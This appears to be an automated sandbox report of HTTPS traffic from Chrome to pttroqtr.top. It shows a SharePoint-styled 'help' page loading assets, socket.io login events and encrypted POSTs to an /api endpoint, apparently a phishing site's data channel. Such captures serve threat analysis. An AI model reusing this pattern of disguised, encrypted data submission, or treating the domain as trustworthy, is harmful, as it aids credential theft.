                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/assets/2dd339f2kFGym.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: font/woff
                                                                                                                                                                                            Content-Length: 63712
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"f8e0-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16073INData Raw: 77 4f 46 46 00 01 00 00 00 00 f8 e0 00 12 00 00 00 01 9f 0c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 94 00 00 00 1c 00 00 00 1c 5d c5 46 7e 47 44 45 46 00 00 01 b0 00 00 00 1e 00 00 00 20 03 de 00 03 47 50 4f 53 00 00 01 d0 00 00 00 20 00 00 00 20 6c 91 74 8f 47 53 55 42 00 00 01 f0 00 00 01 bf 00 00 02 8a 48 8f b8 db 4f 53 2f 32 00 00 03 b0 00 00 00 5f 00 00 00 60 a1 36 9e d6 63 6d 61 70 00 00 04 10 00 00 03 22 00 00 04 7e cd 2a 1c 8d 63 76 74 20 00 00 07 34 00 00 00 44 00 00 00 44 0b 07 0e 4a 66 70 67 6d 00 00 07 78 00 00 01 b1 00 00 02 65 0f b4 2f a7 67 61 73 70 00 00 09 2c 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 09 34 00 00 cf da 00 01 5a 1c 68 39 4b f8 68 65 61 64 00 00 d9 10 00 00 00
                                                                                                                                                                                            Data Ascii: wOFFFFTM]F~GDEF GPOS ltGSUBHOS/2_`6cmap"~*cvt 4DDJfpgmxe/gasp,glyf4Zh9Khead
                                                                                                                                                                                            2024-09-28 03:39:31 UTC16384INData Raw: 34 02 25 93 04 9c 81 b8 23 be e0 da a0 e6 3c 16 ec 39 f2 a2 7a 60 c6 ec c7 9f 2e eb 7b 6c cc c2 67 0a cb 9f bf ef c8 f7 b1 1b 8d a4 d3 1d db 6a 06 af 1f af 9e 9f 77 db 9b 8b 9f 7e 69 ef dd 43 57 ef de 7e 70 17 bf 97 37 3c fc c0 9c 65 a4 e4 a9 06 23 0b 7a 2e 2c 1f 72 e7 d0 51 ea bf 3f bf 5b 9d 19 2c 58 97 1f 88 ce 9f 5c bf f1 ce 61 cf 6d 19 6b 30 de 7b 61 eb ee 3a 0a fb e9 aa 1b e3 86 01 f6 bd 18 df 25 bd 58 3b c6 be d2 bd ed c3 70 61 1f 77 dd f6 59 b7 5e b7 9d d4 fc 9e d4 4e f7 9c f5 9f 6c a6 ed 57 fe 0e 87 71 2c ed ff ab c6 77 6f a3 fd 9f 03 3e 1a 4a 6a 9f 75 25 87 f6 47 7e 3c a8 a5 1d f8 ee b3 b4 fd 47 68 cf a6 e3 ff aa f1 dd fd 54 4e 9e 8a b1 4f a0 57 62 dd 81 21 5a 56 2c c6 97 e5 95 d0 60 7f 53 09 ad 3b 00 08 92 91 92 70 46 60 69 17 2c 35 90 9b 21 39
                                                                                                                                                                                            Data Ascii: 4%#<9z`.{lgjw~iCW~p7<e#z.,rQ?[,X\amk0{a:%X;pawY^NlWq,wo>Jju%G~<GhTNOWb!ZV,`S;pF`i,5!9
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 36 f0 94 96 64 0d 91 7d c0 b4 9e b9 af e1 f5 f5 df fd c6 5f b5 5a 43 b6 7d 21 8b 35 64 de 27 d5 11 b3 2d 13 ab 42 63 3f 61 c2 2b 0b 82 e1 5a 1d 82 2a e0 dd 0f 74 eb 3e 24 5f 37 e4 40 68 df 1e 4e d2 23 92 28 7b b0 5e 63 70 79 7d 60 28 e8 6c 61 2d 8f 60 3b 3a cb e5 88 6a 92 29 7b 1c b9 aa d6 b2 c0 96 00 98 48 47 12 71 2e f1 df b5 76 16 bd 5b bd 8c 8e 98 b5 71 6c 60 d1 4b 4b 73 7b de 7d 6b 5a 4d ea 6d 77 75 cb 5e bc 81 cc 63 ff 1d 78 f6 f1 7e 3a f2 ef 45 8b a8 4d db 77 d9 36 da 91 1c 9c 7a 47 41 b4 bb bc b7 f0 f6 a9 b4 5c 93 41 2b a0 5e 89 ad 9f 09 b0 2f d9 fe 67 4b b9 52 4f 5e 77 1b 96 52 d8 ee eb e1 3c f9 04 ad 9a f7 44 38 c5 cd b9 d4 52 c0 b9 cf 61 e3 f7 d9 80 ce cb e8 4e cd 81 f1 eb 6d 61 9d 41 8c 5f 25 c6 af ba ce f0 4d 0b 53 da f4 9b f2 27 1a 56 fd 44
                                                                                                                                                                                            Data Ascii: 6d}_ZC}!5d'-Bc?a+Z*t>$_7@hN#({^cpy}`(la-`;:j){HGq.v[ql`KKs{}kZMmwu^cx~:EMw6zGA\A+^/gKRO^wR<D8RaNmaA_%MS'VD
                                                                                                                                                                                            2024-09-28 03:39:32 UTC14871INData Raw: 44 8f 9b 18 88 15 52 41 30 54 79 27 de 53 54 78 78 dd 83 07 f6 fa 8e 6f dd fd d4 a6 92 d2 f2 92 59 d3 13 27 8c 4b 1a 33 7d fb 94 31 63 26 09 d9 63 57 e6 e4 cc 1a b3 e0 a1 d5 35 8f 4c 2e 3a b2 6c cb c3 2b 87 4e 9c 38 74 c4 d4 44 5d df 12 b2 de 3d de 91 5f 55 38 74 28 a5 09 27 9d eb 21 d5 39 2e 96 ce b5 36 68 05 56 63 a5 2f 03 94 9a 73 fb fb 48 a1 22 90 76 2b 56 7e 4c a2 f4 6e f2 f8 25 2b cb f6 6a e7 14 6d b7 2f 89 ce d1 60 8e 11 70 8e 06 2d 2b b7 1a 03 89 4d 21 b9 ae 09 8d fd 4a 89 29 36 55 93 52 14 3e d5 8a be 0d 3d 08 c2 f9 fc 63 4d be 3f fe 7e 46 6e ee 2c 12 63 d3 39 57 8e dc d4 dc 70 cf bd 25 2b 16 ce 9c 3e 5b 3c f4 d8 f1 0f 5e 91 7f e8 36 ae 8c 21 e3 bc 83 76 6f 9b 3e fb 9e e1 55 cb 67 03 3d d4 09 0e fe 2c 5d 3f 0b bd 81 43 75 0c 0d 52 38 66 d2 dc e1
                                                                                                                                                                                            Data Ascii: DRA0Ty'STxxoY'K3}1c&cW5L.:l+N8tD]=_U8t('!9.6hVc/sH"v+V~Ln%+jm/`p-+M!J)6UR>=cM?~Fn,c9Wp%+>[<^6!vo>Ug=,]?CuR8f


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            41192.168.2.5497638.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjawy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC2OUTData Raw: 34 30
                                                                                                                                                                                            Data Ascii: 40
                                                                                                                                                                                            2024-09-28 03:39:31 UTC198INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:31 UTC2INData Raw: 6f 6b
                                                                                                                                                                                            Data Ascii: ok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            42192.168.2.5497608.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:31 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjax1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:31 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:31 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 32
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:31 UTC32INData Raw: 34 30 7b 22 73 69 64 22 3a 22 53 63 31 67 78 75 6a 34 54 4f 58 2d 78 6f 4e 32 41 45 66 32 22 7d
                                                                                                                                                                                            Data Ascii: 40{"sid":"Sc1gxuj4TOX-xoN2AEf2"}


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            43192.168.2.5497648.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:32 UTC622OUTPOST /api/MC40NjgzNzc3MjY1OTI2NzY3NA== HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 296
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Content-Type: text/encrypt
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:32 UTC296OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 2f 42 51 58 4a 68 32 56 6d 4e 4f 38 52 42 6e 78 42 44 67 64 6e 49 61 2b 63 33 65 65 78 76 68 53 6f 58 62 45 42 6b 38 4a 4e 44 4c 48 38 2b 34 48 79 74 4f 4c 43 45 6c 33 31 71 64 35 58 4c 6b 4b 65 46 47 4b 32 74 2f 58 44 34 36 75 2f 70 6b 59 34 6d 63 39 74 4d 36 6b 76 52 45 38 49 6b 57 43 79 6f 67 57 6f 4a 42 36 2b 74 53 42 65 62 72 55 67 7a 53 4e 52 70 37 6a 6c 57 66 2b 45 38 74 42 6c 67 69 39 51 35 4a 56 36 66 4a 6b 57 4f 56 68 6e 49 68 67 54 6a 58 67 5a 77 6e 67 51 50 35 55 75 77 73 6d 38 50 64 32 52 51 5a 4f 42 67 6b 68 59 52 36 42 67 78 49 41 51 2b 44 38 46 43 72 30 46 31 37 39 34 69 4d 77 44 39 30 64 48 35 37 74 78 53 73 78 37 64 79 79 4b 41 4c 31 49 66 55 68 59 36 32 4c 68 6d 4f 74 36 53 56 77 71 67 59 66 51 33 55 49 66
                                                                                                                                                                                            Data Ascii: U2FsdGVkX1/BQXJh2VmNO8RBnxBDgdnIa+c3eexvhSoXbEBk8JNDLH8+4HytOLCEl31qd5XLkKeFGK2t/XD46u/pkY4mc9tM6kvRE8IkWCyogWoJB6+tSBebrUgzSNRp7jlWf+E8tBlgi9Q5JV6fJkWOVhnIhgTjXgZwngQP5Uuwsm8Pd2RQZOBgkhYR6BgxIAQ+D8FCr0F1794iMwD90dH57txSsx7dyyKAL1IfUhY62LhmOt6SVwqgYfQ3UIf
                                                                                                                                                                                            2024-09-28 03:39:32 UTC238INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:32 GMT
                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                            Content-Length: 36
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            ETag: W/"24-aAe/DXNByHwUH6eiMUU+BvvcbmM"
                                                                                                                                                                                            2024-09-28 03:39:32 UTC36INData Raw: 55 32 46 73 64 47 56 6b 58 31 2b 49 64 71 54 67 2f 71 6e 52 69 4e 39 6f 33 6d 69 73 6e 4d 62 63 76 69 6b 3d
                                                                                                                                                                                            Data Ascii: U2FsdGVkX1+IdqTg/qnRiN9o3misnMbcvik=


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            44192.168.2.5497668.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:32 UTC627OUTGET /help/assets/8b4af40ckFGym.css HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/assets/2dd339f2kFGym.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:32 UTC350INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:32 GMT
                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                            Content-Length: 338202
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:42 GMT
                                                                                                                                                                                            ETag: W/"5291a-18fc3d84650"
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16034INData Raw: ef bb bf 2f 2a 20 5f 6c 63 69 64 3d 22 31 30 35 35 22 20 5f 76 65 72 73 69 6f 6e 3d 22 31 36 2e 30 2e 34 36 38 31 22 0d 0a 5f 4c 6f 63 61 6c 42 69 6e 64 69 6e 67 20 2a 2f 0d 0a 62 6f 64 79 2c 0d 0a 2e 6d 73 2d 63 6f 72 65 2d 64 65 66 61 75 6c 74 46 6f 6e 74 2c 0d 0a 23 70 61 67 65 53 74 61 74 75 73 42 61 72 2c 0d 0a 2e 6d 73 2d 73 74 61 74 75 73 2d 6d 73 67 2c 0d 0a 2e 6a 73 2d 63 61 6c 6c 6f 75 74 2d 62 6f 64 79 0d 0a 7b 0d 0a 2f 2a 20 5b 52 65 70 6c 61 63 65 46 6f 6e 74 28 74 68 65 6d 65 46 6f 6e 74 3a 22 62 6f 64 79 22 29 5d 20 2a 2f 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 22 53 65 67 6f 65 22 2c 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 66 6f 6e 74 2d 73
                                                                                                                                                                                            Data Ascii: /* _lcid="1055" _version="16.0.4681"_LocalBinding */body,.ms-core-defaultFont,#pageStatusBar,.ms-status-msg,.js-callout-body{/* [ReplaceFont(themeFont:"body")] */ font-family:"Segoe UI","Segoe",Tahoma,Helvetica,Arial,sans-serif;font-s


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            45192.168.2.5497658.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:32 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjbC1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 49
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:32 UTC49OUTData Raw: 34 32 30 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 53 63 31 67 78 75 6a 34 54 4f 58 2d 78 6f 4e 32 41 45 66 32 22 2c 5b 22 75 73 65 72 22 5d 5d
                                                                                                                                                                                            Data Ascii: 420["login","user-Sc1gxuj4TOX-xoN2AEf2",["user"]]
                                                                                                                                                                                            2024-09-28 03:39:32 UTC198INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:32 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:32 UTC2INData Raw: 6f 6b
                                                                                                                                                                                            Data Ascii: ok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            46192.168.2.5497698.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:32 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjbBy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:32 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:32 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 58
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:32 UTC58INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 31 2c 22 75 73 65 72 2d 53 63 31 67 78 75 6a 34 54 4f 58 2d 78 6f 4e 32 41 45 66 32 22 2c 74 72 75 65 5d
                                                                                                                                                                                            Data Ascii: 42["online-count-user",1,"user-Sc1gxuj4TOX-xoN2AEf2",true]


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            47192.168.2.5497708.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:32 UTC599OUTGET /help/layout/images/32.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:32 UTC312INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:32 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 68762
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"10c9a-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16072INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 d0 00 00 03 66 08 06 00 00 00 31 1c e4 c4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRf1tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
                                                                                                                                                                                            2024-09-28 03:39:32 UTC16384INData Raw: 66 86 8f ae 9b fd 60 fe 1a cd af 34 df f5 6e 3b ac 5e 93 e6 03 cd 39 e2 9a 69 ac 51 cc 1a 69 1a 29 4d d9 a4 35 db 69 1e d3 fc 46 b3 39 e7 b3 bf 65 c7 be 16 99 63 b5 e7 02 b6 c6 c9 1a 69 00 a0 48 6c c5 a4 ad 58 b5 95 9d 2f 51 8e c0 b3 e7 30 57 50 06 00 00 00 20 7a 68 a0 01 00 00 a1 d5 ad 5b 37 c9 e5 72 85 7f 02 e5 9f 09 34 e6 6d cd cf 35 ab 7a 6b 7d 9d e6 30 cd ad e2 46 cd db bb 64 ad e9 c0 a6 d5 64 22 74 4a fc 57 f3 53 cd 5e 9a df ad a6 66 a5 54 e5 5d a7 5f 8a 6b 88 5a 8f 7b 6f bb d8 2a 27 9b 7e 62 eb 13 8e d5 3c 2f bc fb bb dc 0e 16 d7 44 63 d3 b0 d6 a1 1c fe d4 fc e5 e4 7c a2 20 91 48 e4 1b 68 2c 00 50 64 d6 9d f8 3d cd 3d 94 22 f0 ec cd 08 c3 28 03 00 00 00 10 2d 34 d0 00 00 80 d0 ea de bd bb f4 e9 d3 47 b2 d9 6c 41 1b 69 e2 c3 06 88 a4 92 7e 3a 54 7b
                                                                                                                                                                                            Data Ascii: f`4n;^9iQi)M5iF9eciHlX/Q0WP zh[7r4m5zk}0Fdd"tJWS^fT]_kZ{o*'~b</Dc| Hh,Pd=="(-4GlAi~:T{
